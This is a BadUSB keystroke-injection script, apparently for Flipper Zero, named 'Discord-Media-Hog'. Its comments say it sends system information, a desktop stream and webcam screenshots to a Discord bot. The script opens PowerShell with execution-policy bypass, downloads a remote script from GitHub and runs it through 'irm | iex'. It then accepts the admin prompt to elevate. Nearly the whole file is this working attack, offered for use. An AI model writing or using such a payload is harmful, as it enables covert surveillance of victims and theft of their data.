REM Title: Discord-Media-Hog
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses a Discord bot to send system information, a stream desktop and webcam screenshots
REM Description: READ SETUP IN MAIN.PS1
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C $token = 'YOUR_BOT_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Discord-Media-Hog/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y
